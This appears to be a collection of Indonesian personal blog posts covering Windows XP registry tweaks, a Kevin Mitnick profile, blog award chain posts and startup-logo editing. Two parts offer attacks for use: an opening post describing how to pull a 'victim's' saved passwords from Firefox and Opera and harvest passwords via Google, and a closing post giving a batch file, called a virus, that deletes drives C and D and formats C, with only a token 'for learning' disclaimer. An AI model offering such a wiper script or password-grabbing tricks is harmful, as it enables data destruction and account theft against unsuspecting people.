Kebanyakan browser pada saat ini memiliki fasilitas untuk menyimpan password. Misalnya saat meggunakan Mozilla Firefox, anda pasti sering menerima kotak dialog konfirmasi yang menanyakan apakah anda ingin password anda disimpan atau tidak oleh PasswordManager.Kebanyakan user cenderung untuk memilih opsi YES, entah itu dengan penuh kesadaran atau memang mereka tidak tau ( baca: tidak mau tau) apa maksud dari kotak dialog itu.

Orang lain yang kemudian mengunakan browser itu bisa dengan sangat mudah mendapatkan password korban dengan memasuki menu Tools —> Options —> Security –> Saved password.

Contoh lain adalah fasilitas wand password yang dimiliki oleh browser Opera. Saat anda memasukkan user name dan password pada suatu form dan menekan tombol submit, opera secara default akan meminta konfirmasi kepada anda apakah anda ingin browser menyimpan id dan password anda atau tidak. Lagi dan lagi… kebanyakan netter ceroboh, mereka cenderung untuk memilih opsi “YES”.

Lalu?? Orang lain yang kemudian menggunakan browser itu bisa melihat situs apa saja yang telah diakses oleh user, arahkan browser ke situs tersebut, letakkan cursor pada form isian user name, tekan [ALT]+[ENTER] dan BOOOMM!!!! Kenapa?? Jangan kaget dulu!! Hehehe.. form login akan otomatis terisi dengan user name korban lengkap dengan passwordnya ;D (It’s fun enough.. ;)

Ini hanya sebagian kecil contoh, jelajahi fitur-firtur browser lain!

[9]. Googling

Google.com. Banyak sudah situs yang runtuh, password dan nomor – nomor kartu kredit yang dicuri akibat dari ulah orang yang menyalahgunaan kesaktiannya ;) Dahulu, hal ini mudah dilakukan.Hanya dengan mengetikkan kata kunci tertentu yang berkaitan dengan user name dan password, anda bisa memanen ratusan password user melalui google. Tapi sekarang tampaknya anda harus gigit jari jika menggunakan cara diatas ;D

Jangan sedih dulu karena Google baru saja menelurkan produk barunya, yaitu Google Code Search. Ancaman baru mulai timbul, “si pintar” ini kini dapat meng-crawl hingga kepada archive file yang berada di public directory web server. Hati-hati yang punya kebiasaan untuk menyimpan informasi penting di dalamnya (password, dan info berharga lainnya) Sebaiknya mulai sekarang kebiasaan itu dihilangkan. Selalu proteksi folder-folder yang sensitif agar situs anda bisa hidup lebih lama. Kalo nggak… yach.. tunggu ajah ada orang yang memanfaatkan produk baru google ini untuk mengeruk informasi sensitif dari web server anda. dan jika itu sudah terjadi… maka bersiaplah.. “taman bermain” anda akan diambil alih olehnya..

sumber The Hacking : forum diskusi

»»  READMORE...

award ke_empatku



wah wah banjir award nieh hahahy
makasih buat kang etam grecek
yah langsung ke awardnya


1.apa nama blog kamu???
Iman qidiess blog
2.apa tema blog kamu???
Banyak sekali ,, blogging trik . internet. Computer dan masih banyak lagi kalo di sebutin hahhay penuh
3.bagi kamu blog itu apa sih???
tempat sharing berbagai niformasi yang kita ketahui
4.apa yang kamu cari atau tujuan kamu ngeblog???
Banyak,, bisa di kenal banyak orang , punya banyak temen, bias saling sharing informasi DLL
5.bagikan award dan tag ini ke 5 orang terdekat???
Ini award bisa di ambil oleh sapa saja ^^

Udah makasih semua udah mau baca


»»  READMORE...

cara mengoptimasi kinerja windows XP



yah posting ini akan memberikan sedikit tips bagaimana mengoptimasikan kinerja windows XP kita melalui registry edit, namun trik ini juga bisa membuat komputer tidak stabil apabila kita salah dalam mengedit. Oleh karena itu, sebelum mengedit, alangkah baiknya melakukan back up terlebih dahulu.


Langkah - langkah :
Klik start.
Pilih menu Run.
Kemudian ketikkan Regedit.

1. Mengurangi waktu tunggu windows.
-> Klik pada HKEY_LOCAL_MACHINE [System] [CurrentControlSet] [Control].
-> Pilih "WaitToKillServiceTimeout"
-> Double klik kiri pada value, ubah value menjadi "100".
-> Klik Ok.

2. Mempercepat akses Folder dengan mendisable Last Access Update.
Kalau kamu memiliki banyak folder dan subdirektori, maka akses ke Direktory Windows XP terasa sangat berat dan seringkali hanya membuang-buang waktu. Dengan mengupdate time stamp di registry, yaitu last access update untuk semua sub directory.
-> Klik pada HKEY_LOCAL_MACHINE [System] [CurrentControlSet] [Control] [FileSystem].
-> Buat Value, cara nya : Klik kanan (cari area yg kosong), lalu pilih ‘DWORD Value’.
-> Isi DWORD Value dengan nama ‘NtfsDisableLastAccessUpdate’.(Tidak memakai spasi).
-> Ubah value menjadi ‘1'.
-> Klik ‘OK’.

3. Mempercepat waktu Boot.
Fitur yg lumayan asik dari Windows XP adalah kemampuan untuk mendefrag dalam proses booting. Boot Defrag pada prinsip menata file-file yg relevan dengan booting secara berurutan. Secara default fitur ini telah diaktifkan pada beberapa Build Windows, tapi beberapa build windows tidak, ada baiknya kalo kita cross check terhadap fitur yg satu ini.

-> HKEY_LOCAL_MACHINE [SOFTWARE] [Microsoft] [Dfrg] [BootOptimizeFunction].
-> Cari “Enable” dibagian kanan regedit.
-> Ubah value menjadi "Y" to enable.
-> Klik Ok.

4. Mempercepat Restart Windows XP.
-> HKEY_LOCAL_MACHINE [Software] [Microsoft] [Windows NT] [Current Version] [Winlogon].
-> Buat String value baru, cara nya : Klik kanan (cari area yg kosong), lalu pilih ‘String Value’.
-> Isi String value dengan "EnableQuickReboot" dan isi defautnya dengan "1".
-> Kemudian Ok.

5. Mempercepat Akses Memory.
-> HKEY_LOCAL_MACHINE [SOFTWARE] [Microsoft] [Windows] [CurrentVersion] [Explorer].
-> Pilih menu Edit > New > Key dan beri nama "AlwaysUnloadDLL".
-> Pada option Default Value masukkan angka 1.

6. Mempercepat Loading menu.
Dengan tweak komputer kita terasa lebih cepat. Tweaking ini membuang waktu delay ketika kita mengklik menu dan windows XP menampakkan Menu.
Caranya :
-> Klik HKEY_CURRENT_USER [ControlPanel] [Desktop]
-> Pilih MenuShowDelay.
-> Ubah value menjadi "100".
-> Ok.
*:Angka 50-150 merupakan kisaran angka yang baik.

7. Mempercepat Shutdown windows XP.
Tweaking ini mengurangi waktu tunggu secara otomatis ketika windows sudah menerima instruksi untuk shutdown.
-> [HKEY_CURRENT_USER] [ControlPanel] [Desktop].
-> Pilih "WaitToKillAppTimeout".
-> Ubah value menjadi "100" (aslinya 20000).
-> Pilih "HungAppTimeout".
-> Ubah value menjadi "0".
-> Pilih "WaitToKillAppTimeout".
-> Ubah value menjadi "100".
-> Ok.

8. Mempercepat Performa Swap File.
Jika kamu memiliki ram lebih besar dari 256MB bisa dibilang tweaking yg ini akan membuat sistem anda berjalan lebih cepat. Tweaking ini pada dasarnya PC kita mengunakan setiap byte dari memori fisik yg terpasang di komputer, Sebelum mengunakan swap file.
Caranya :
-> Start>Run.
-> “msconfig.exe”>ok.
-> Klik tab System.ini.
-> Klik tanda plus pada tab 386enh
-> Klik kotak new kemudian ketik “ConservativeSwapfileUsage=1".
-> Klik OK.

9. Mempercepat Loading Start up. Caranya : -> Start>Run. -> “msconfig.exe”>ok. -> Klik Tab Boot.ini. -> Ubah Timeout menjadi "3". -> Klik tab startup. -> Hilangkan tanda cek pada program-program yang tidak perlu dijalan kan pada startup. -> Kemudian Klik Ok. 10. Mempercepat Booting. -> Buat file ntosboot.bat yang berisi "del c:\windows\prefetch\ntosboot-*.* /q" berfungsi untuk menghapus file ntosboot.pf di C:\Windows\Prefetch. Atau kamu bisa mendownload nya Disini. -> Buka group policy dengan cara : Klik Start>Run>gpedit.msc. -> Buka folder Windows settings. -> Double klik pada Scripts (Startup/Shutdown) dan double klik lagi pada Shutdown. -> Pada jendela Scripts, klik Add...kemudian Browse... -> Masukkan file ntosboot.bat yg kamu simpan di C:\. -> Klik Apply kemudian Ok. 11. Mempercepat Loading Program. Tweaking ini bisa berjalan untuk sebagian besar program. Jika program tidak mau loading seperti yg diharapkan, silahkan aja dikembalikan ke setting semula. -> Klik kanan pada icon/shortcut yg berkaitan dengan program. -> properties. -> Pada kotak ‘target’, tambahkan ‘ /prefetch:1' diakhir kalimat. -> Ok. 12. Mematikan Autoplay pada Windows XP. -> Klik Start>Run>gpedit.msc. -> Pilih computer configuration > administrative templates > kemudian system. -> Didalam system akan terlihat opsi Turn Off Autoplay. -> Aktifkan opsi tersebut dan pilih enabled. -> Ok. 13. Menonaktifkan Microsoft System Sounds. Secara default MS sound systems membuat komputer berbunyi/bersuara ketika booting awal, shutdown, error, dll. Skenario suara windows membuat komputer lebih lambat (terutama dalam waktu shutdown dan booting awal), untuk menonaktifkan silahkan ikuti langkah berikut: -> Buka Control Panel. -> Klik Sounds and Audio Devices. -> Klik tab Sounds. -> Pilih “No Sounds” dari Sound Scheme. -> Klik “No”. -> Klik “Apply”. -> Klik “OK”.
Semoga Sukses......

»»  READMORE...

LEGENDA SANG HACKER

legenda sang hacker dunia

Kevin Mitnick, Sang Legenda Hacker.......

Sebuah ketukan terdengar dari pintu apartemennya, Kevin Mitnick membuka pintu dan mendapati lusinan agen FBI dan penegak hukum lain sudah bersiap untuk menangkapnya.

Ini adalah akhir perjalanan seorang hacker yang terpaksa buron demi menghindari hukuman penjara. Hacker yang selama masa buronannya itu telah mendapatkan status legendaris,

bahkan telah tumbuh menjadi sebuah mitos yang lebih besar dari dirinya sendiri.

Penangkapan yang terjadi pada 1995 itu menandai awal dari kasus penahanan yang paling kontroversial terhadap seorang pelaku kejahatan cyber. Mitnick adalah seorang penyusup pada sistem komputer dan menjelma sebagai America's Most Wanted Hacker.

Kecanduan Komputer

Karena keluarganya tidak cukup berduit untuk memiliki komputer sendiri, Mitnick mempelajari komputer dengan nongkrong di toko radioshack atau di perpustakaan umum.

Pada periode 1990-an, Mitnick mudah sekali keluar masuk sistem komputer. Namun pada akhir 1980-an ia sebenarnya ingin meninggalkan hobinya itu dan mulai mencari pekerjaan yang sah. Sayangnya, sebelum mendapatkannya, pada 1987 ia tertangkap karena menyusup perusahaan Santa Cruz Organization, sebuah perusahaan piranti lunak yang terutama bergerak di bidang sistem operasi Unix.
Ketika itu pengacara Mitncik berhasil menurunkan tuduhan kejahatan menjadi tindakan yang kurang baik, Mitnick pun hanya diganjar 3 tahun masa percobaan.

Tidak sampai setahun Mitnick kembali tersandung kasus hukum. Gara-garanya seorang teman yang komputernya ia gunakan untuk membobol komputer lain melaporkan Mitnick ke pihak berwajib. Computer yang dibobol Mitnick adalah milik Digital Equipment Corporation (DEC).

Setiap kali membobol komputer yang dilakukan Mitnick adalah mengambil code penyusun dari piranti lunak. Kode itu kemudian dia pelajari dengan sungguh-sungguh, terkadang menemukan beberapa kelemahan di dalamnya. Dalam sebuah kesempatan Mitnick hanya mengaku mengambil kode penyusun dari piranti lunak yang ia sukai atau yang menarik baginya.

Dalam kasus DEC Mitnick mendapatkan masa tahanan yang lebih berat. Ketika itu pengacaranya menyebut Mitnick memiliki "kecanduan pada komputer yang tidak bisa dihentikan". Ia diganjar 1 tahun penjara.

Di penjara Mitnick mendapatkan pengalaman yang buruk. Pada saat itu, nama Mitnick atau yang lebih dikenal dengan nama samaran ‘the Condor' sebagai seorang penjahat komputer demikian melegenda. Sehingga sipir di Lompoc, penjara tempat Mitnick ditahan, mengira Mitnick bisa menyusup ke dalam komputer hanya dengan berbekal suara dan telepon.

Walhasil, Mitnick bukan hanya tidak boleh menggunakan telepon, ia juga menghabiskan waktu berbulan bulan dalam ruang isolasi. Tak heran jika kemudian ia dikabarkan mengalami sedikit gangguan jiwa saat menjalani hukuman di Lompoc.

Tahun 1989 Mitnick dilepaskan dari penjara. Ia berusaha mencari pekerjaan yang resmi, namun statusnya sebagai mantan narapidana membuat Mitnick sulit mempertahankan pekerjaan.

Akhirnya ia bekerja sebagai pendulang informasi untuk kantor penyelidik kantor swasta. Tentunya ini menyeret Mitnick kembali kepada dalam dunia maya. Pada awal 1990-an, Mitnickpun dicari lagi oleh FBI. Kali ini takut akan masuk ruang isolasi selama bertahun-tahun, Mitnick memutuskan untuk kabur.

Hacking The Human Side

Keahlian Mitnick sebagai hacker tidak terbatas pada kemampuan teknis belaka. Ia merupakan seorang yang memahami betul bahwa keamanan sistem komputer terdiri dari aspek kebijakan organisasi, sumber daya manusia, proses yang terlibat serta teknologi yang digunakan.

Seandainya ia seorang pahlawan super, kemampuan utama Mitnick adalah orang yang mempraktekan ilmu social enggineering alias rekayasa sosial. Ini adalah sebuah teknik mendapatkan informasi penting, semisal password, dengan memanfaatkan kelemahan manusiawi.

Kemampuan Mitnick paling baik diilustrasikan dalam cerita berikut, cerita yang dikisahkan Mitnick sendiri pada sebuah forum online Slasdot.org

"Pada satu kesempatan, saya ditantang oleh seorang teman untuk mendapatkan nomor (telepon) Sprint Foncard-nya. Ia mengatakan akan membelikan makan malam jika saya bisa mendapatkan nomor itu. Saya tidak akan menolak makan enak, jadi saya berusaha dengan menghubungi Customer Service dan perpura-pura sebagai seorang dari bagian teknologi informasi. Saya tanyakan pada petugas yang menjawab apakah ia mengalami kesulitan pada ssitem yang digunakan. Ia bilang tidak, saya tanyakan sistem yang digunakan untuk mengakses data pelanggan, saya berpura-pura ingin memverifikasi. Ia menyebutkan nama sistemnya."

"Setelah itu saya kembali menelepon Costumer Service dan dihubungkan dengan petugas yang berbeda. Saya bilang bahwa komputer saya rusak dan saya ingin melihat data seorang pelanggan.

Ia mengatakan data itu sudah berjibun pertanyaan. Siapa nama anda? Anda kerja buat siapa? Alamat anda dimana? Yah, seperti itulah. Karena saya kurang riset, saya mengarang nama dan tempat saja. Gagal. Ia bilang akan melaporkan telepon-telepon ini pada keamanan."

"Karena saya mencatat namanya, saya membawa seorang teman dan memberitahukannya tentang situasi yang terjadi. Saya meminta teman itu untuk menyamar sebagai 'penyelidik keamanan' untuk mencatat laporan dari petugas Customer Service dan berbicara dengan petugas tadi. Sebagai 'penyelidik' ia mengatakan menerima laporan adanya orang berusaha mendapatkan informasi pribadinya pelanggan. Setelah tanya jawab soal telepon tadi, 'penyelidik menanyakan apa informasi yang diminta penelepon tadi. Petugas itu bilang nomor Foncard. 'penyelidik' bertanya, memang berapa nomornya? Dan petugas itu memberikan nomornya. Oops. Kasus selesai"

Buron

Sebagai buronan Mitnick sering berpindah-pindah tempat tinggal dan selalu menanggalkan berbagai kebiasaannya. Namun, satu hal yang tidak bisa ditinggalkan adalah hobinya mengoprek komputer dan jaringan Internetnya.

Bahkan beberapa keahliannya konon digunakan untuk mendapatkan identitas baru. Selama buron reputasinya semakin menjadi. Ia menjelma sebagai 'Ninja Cyber' yang konon bisa membobol komputer Pentagon hanya dengan remote televisi, sebuah rumor yang melebihi cerita fiksi apapun.

Mengapa Mitnick, seorang buron dalam kasus pembobolan komputer, bisa menjadi penjahat yang paling dicari? Ini tak lepas dari peran media massa. Secara khusus adalah serangkaian artikel sensasional dari John Markoff yang dimuat di New York Times.

Markoff mengutuk Mitnick bagaikan seorang teroris. Dalam sebuah pernyataan setelah lama dibebaskan, Mitnick menyebut citra dirinya yang ditampilkan Markoff bagaikan seorang teroris yang berusaha mengendalikan nuklir dunia.

"Saya seakan-akan seorang Osama bin Mitnic," ujarnya bercanda.

Markoff menggambarkan Mitnick sebagai seorang yang mematikan, tak bisa dihentikan dan layak menjadi buronan sepuluh besar FBI maupun penegak hukum lainnya. Artikel Mafkoff, yang kadang muncul di halaman depan, menjadikan Mitnick kandidat terkuat proyek percontohan atas kejahatan cyber. Maka masa depan Mitnick dalam penjara boleh dibilang sudah dituliskan saat itu juga.

Selama menjadi buron Mitnick tetap menjalankan aksinya. Ia membobol berbagai komputer perusahaan besar. Termasuk Sun Microsystem. Ia membobol rekening seorang pada layanan penyimpanan online untuk menyimpan backup dari hasil aksinya. Sebenarnya Mitnick tidak bekerja sendirian namun saat tertangkap ia tak pernah mengungkapkan siapa saja rekannya.

Salah satu korban Mitnick adalah T. Shimomura, seorang ahli komputer yang dalam beberapa tulisan di internet diragukan kebersihannya. Ada dugaan bahwa Shimomura juga seorang hacker yang kerap melakukan perbuatan ilegal. Satu hal yang banyak disetujui adalah Shimomura memiliki sikap yang arogan dan nampaknya ingin muncul sebagai pahlawan dalam kisah perburuan Mintick.

Shimomura, Markoff dan FBI bahu membahu untuk menangkap sang buronan. Panduan dari berita sensasionalnya Mafkoff, kemampuannya hacking Shimomura dan kekuatan hukum FBI pada akhirnya melacak kediaman Mitnick.

Seperti biasanya kisah tertangkapnya seoarang buron, Mitnick melakukan keteledoran. Layanan penyimpanan yang ia gunakan rupanya memiliki program otomatis untuk mencek isi file yang disimpan. Pemilik rekening yang digunakan Mitnick mendapatkan peringatan dari sistem mengenai kapasitas berlebih. Ini adalah awal tertangkapnya Mitnick.

Mitnick mengakui bahwa dirinya ceroboh karena tidak menduga bahwa FBI, Shimomura, Markoff, dan penyedia layanan telepon selular melakukan kerja sama yang begitu erat dan terpadu.

"Operator seluler melakukan pencarian dalam database penagihan mereka terhadap dial-up ke layanan Internet Netcom POP. Ini, seperti bisa diduga, membuat mereka bisa mengidentifikasi area panggilan dan nomor MIN (mobile identification number) yang saya gunakan saat itu. Karena saya kerap berganti nomor, mereka mengawasi panggilan data apapun yang terjadi di lokasi tersebut. Lalu, dengan alat Cellscope 2000 Shimomura, melacak sinyal telepon saya hingga ke lokasi yang tepat," Mitnick menuturkan.

Dua minggu sebelum tertangkapnya Mitnick baru pindah ke Raleigh. Lokasi baru membuat kurang waspada dan ia lupa melacak jalur dial-up yang digunakannya. Beberapa jam sebelum tertangkapnya Mitnick, pelacakan dan pengawasan sedang dilakukan terhadap jalur yang ia gunakan.

Saat ia berusaha melacak sejauh mana pengawasan telah dilakukan hingga siapa dibalik pelacakan tersebut, ia mendengar ketukan pintu. Mitnick membuka pintu dan berhadapan dengan lusinan U.S Marshall dan FBI.

Empat Setengah Tahun Digantung

Setelah tertangkap Mitnick ditahan tanpa kemungkinan jaminan. Ia juga tak diajukan untuk pengadilan. Kurang lebih empat tahun ia habiskan tanpa kepastian. Hal ini benar-benar membuat Mitnick frustasi.

Selama dalam penjara FBI ia tak mendapatkan kesempatan mengetahui kasusnya. Bahkan, Mitnick dan pengacaranya tak bisa melihat data kasus tersebut karena terdapat di laptop dan akses laptop bagi Mitnick dianggap membahayakan. Mitnick dituding bisa membuat misil meluncur hanya berbekal laptop atau telepon. Larangan itu tetap berlaku meskipun pengacaranya menggunakan laptop tanpa modem dan kemampuan jaringan apapun.

Mitnick pada akhirnya dituding menyebabkan kerugian hingga ratusan juta dollar. Mitnick menyangkalnya. Karena menurutnya perusahaan yang dirugikan bahkan tidak melaporkan kerugian tersebut dalam laporan tahunan mereka.

Kesepakatan akhir bagi Mitnick adalah pengakuan bersalah. Bersalah dalam kasus pembobolan komputer dan penyadapan jalur telepon. Mitnick menyerah dan mengikuti itu, dengan imbalan 4 tahun tahun lebih waktunya dalam penjara diperhitungkan sebagai masa tahanan. Total Mitnick dihukum adalah 5 tahun dipenjara , 4 tahun dalam tahanan yang terkatung-katung dan 1 tahun lagi sisanya.

Ia dibebaskan pada tahun 2000 dengan syarat tak boleh menyentuh komputer atau telepon. Pada tahun 2002 baru ia boleh menggunakan komputer tapi tidak yang tersambung ke Internet. Baru tahun 2003 ia menggunakan Internet lagi untuk pertama kalinya.

Sejak dibebaskan Mitnic berusaha untuk memperbaiki hidupnya. Ia menuliskan dua buku mengenai hacking, selain itu ia juga mendirikan perusahaan konsultan keamanan sendiri.

"Hacker adalah satu-satunya kejahatan yang keahliannya bisa digunakan lagi untuk sesuatu yang etis. Saya tidak pernah melihat itu dibidang lain, misal perampokan etis," ungkap Mitnick. (yat)

»»  READMORE...

award ketigaku

no post
»»  READMORE...

Sabtu, Juli 03, 2010

award kedua ^^

Thanks buat sobat Natalius yang telah memberiku award ini, makasih banget. Karena ini award ke_dua .. waoh dalam sehari 2 award . Dan sesuai dengan aturan main para blogger, award ini saya bagikan buat sahabat blog saya berikut ini.

Semoga bersedia menerimanya ya! dan bagi teman-teman yang belum dapat, keep waiting for the next award.
Awards ini aku beri untuk sahabat-sahabat berikut:

Aturan Main Para Blogger sebagai berikut : Bagi sobat yang menerima Award ini diharuskan untuk membagikan kembali Award ini kepada sepuluh orang temannya. Selanjutnya, sobat penerima Award harus meletakkan link-link berikut ini :





Sebelum sobat-sobat meletakkan link-link di atas, hapus terlebih dahulu peserta nomor 1 dari daftar. Sehingga semua peserta naik 1 level. Peserta nomor 2 menjadi nomor 1, nomor 3 jadi 2, dst. Kemudian masukkan link da sendiri di bagian paling bawah (nomor 10). Tapi ingat...!!!, kalian semua harus adil dalam menjalankannya. Jika tiap penerima award mampu memberikan award ini kepada 5 orang saja dan mereka semua mengerjakannya , maka jumlah backlink yang akan didapat adalah:
Ketika posisi kamu 10, jumlah backlink = 1
Posisi 9, jumlah backlink = 5
Posisi 8, jumlah backlink = 25
Posisi 7, jumlah backlink = 125
Posisi 6, jumlah backlink = 625
Posisi 5, jumlah backlink = 3,125
Posisi 4, jumlah backlink = 15,625
Posisi 3, jumlah backlink = 78,125
Posisi 2, jumlah backlink = 390,625
Posisi 1, jumlah backlink = 1,953,125

Dan semuanya menggunakan kata kunci yang sobat inginkan. Dari sisi SEO (Search Engine Optimation) sobat sudah mendapatkan 1,953,125 backlink dan keuntungannya, blog sobat akan mendapatkan traffic tambahan, apalagi jika ada yang meng-klik link ke blog sobat. Jadi, jangan sia-siakan award ini ya sobat !
maaf bagi sobat-sobat semua award ini sudah banyak broken link jadi saya hapus link-inknya


»»  READMORE...

first award ^^


Thanks buat sobat ubay yang telah memberiku award ini, makasih banget. Karena ini award pertamaku. Dan sesuai dengan aturan main para blogger, award ini saya bagikan buat sahabat blog saya berikut ini.

Semoga bersedia menerimanya ya! dan bagi teman-teman yang belum dapat, keep waiting for the next award.
Awards ini aku beri untuk sahabat-sahabat berikut:


Aturan Main Para Blogger sebagai berikut : Bagi sobat yang menerima Award ini diharuskan untuk membagikan kembali Award ini kepada sepuluh orang temannya. Selanjutnya, sobat penerima Award harus meletakkan link-link berikut ini :



sebelum sobat-sobat meletakkan link-link di atas, hapus terlebih dahulu peserta nomor 1 dari daftar. Sehingga semua peserta naik 1 level. Peserta nomor 2 menjadi nomor 1, nomor 3 jadi 2, dst. Kemudian masukkan link da sendiri di bagian paling bawah (nomor 10). Tapi ingat...!!!, kalian semua harus adil dalam menjalankannya. Jika tiap penerima award mampu memberikan award ini kepada 5 orang saja dan mereka semua mengerjakannya , maka jumlah backlink yang akan didapat adalah:
Ketika posisi kamu 10, jumlah backlink = 1
Posisi 9, jumlah backlink = 5
Posisi 8, jumlah backlink = 25
Posisi 7, jumlah backlink = 125
Posisi 6, jumlah backlink = 625
Posisi 5, jumlah backlink = 3,125
Posisi 4, jumlah backlink = 15,625
Posisi 3, jumlah backlink = 78,125
Posisi 2, jumlah backlink = 390,625
Posisi 1, jumlah backlink = 1,953,125

Dan semuanya menggunakan kata kunci yang sobat inginkan. Dari sisi SEO (Search Engine Optimation) sobat sudah mendapatkan 1,953,125 backlink dan keuntungannya, blog sobat akan mendapatkan traffic tambahan, apalagi jika ada yang meng-klik link ke blog sobat. Jadi, jangan sia-siakan award ini ya sobat !

maaf link sudah banyak gyang broken jadi link semuanya saya hapus !


»»  READMORE...

cara merubah logo di startup windows

kali ini saia akan membahas tentang startup windowss
Ingin merubah logo saat windows startup?? Itu tuh sebelum windows masuk ke desktop.. Atau ingin memunculkan gambar yang asyik? merubah tulisan "it's now save to turn blablabla..."

saat windows di shutdown!!!Ok........ itu kan bisa dilakukan dengan bantuan software..!! Emang sih, tapi khan kamu perlu tau bagian mana sih yang diubah oleh software-software tersebut. Jadi biar kamu nggak asal klik lalu jadi, tapi tau bagaimana prosesnya. Ok, sekarang saya kasih tau bagaimana caranya........

Carilah file dengan nama logo.sys di komputer anda dengan fasilitas search.

Buka "paint" aplikasi pengolah gambar bawaan windows, nah buka saja logos.sys tadi dengan paint . Nah, file logo.sys itu adalah gambar yang bertuliskan it's now safe to shutdown your computer" inget kan???
Edit saja sesuka hati, kalo perlu tambahin cliptart atau.. apalah.. setelah itu simpan filenya dengan nama "LOGOS.SYS" pada lokasi yang sama dengan "logo.sys"

Restart komputer anda, nah sekarang file logo.sys yang anda edit tadi pasti kelihatan sebagai start up logo di win 98.

FYI, file logo.sys ini tidak bisa menampilkan banyak warna, jadi kadang2 warna yang kita edit kadang tidak sesuai dengan keinginan kita waktu keluar saat start up windows.

Tidak cuma startup logo saja bisa dirubah berikut file yang lain:
c:\logo.sys = logo startup
c:\windows\logow.sys = logo "Please wait....."
c:\windows\logos.sys = logo "it's safe now to turn of your computer"

»»  READMORE...

cara membuat sebuah virus malware

Sekarang saya akan menunjukkan kepada kamu, bagaimana membuat malware (virus).

Sangat mudah dan cepat.ingat,jangan lakukan ini pada komputer Anda sendiri. Karena

sangat berbahaya,dapat memformat dan menghapus sistem anda


backup data anda sebelum Anda melakukan hal ini.

1.Buka Notepad.

2. Ikuti langkah-langkah ini dengan hati-hati, dan resiko di tanggung sendiri jika

terjadi sesuatu pada Komputer Anda.

3. Copy-Paste atau Write-Dalam script di bawah pada Notepad.

@ echo off
echo (untuk mengubah Line)
echo Malware Virus


DEL C: \-y (script buat del drive c)
DEL D: \-y (script buat del drive d)
FORMAT C: \-y (script buat format c)

Jika dilakukan, simpan dengan anyname yang Anda inginkan, tetapi harus format *.

bat (ex: malware.bat). Jadi, virus telah dibuat.

Oke, ini bekerja ketika Anda mengklik 2x. saya hanya ingin berbagi pengetahuan

saja. saya memperingatkan Anda lagi, Do Not Disturb Anyone, ini hanya untuk

pembelajaran saja.

»»  READMORE...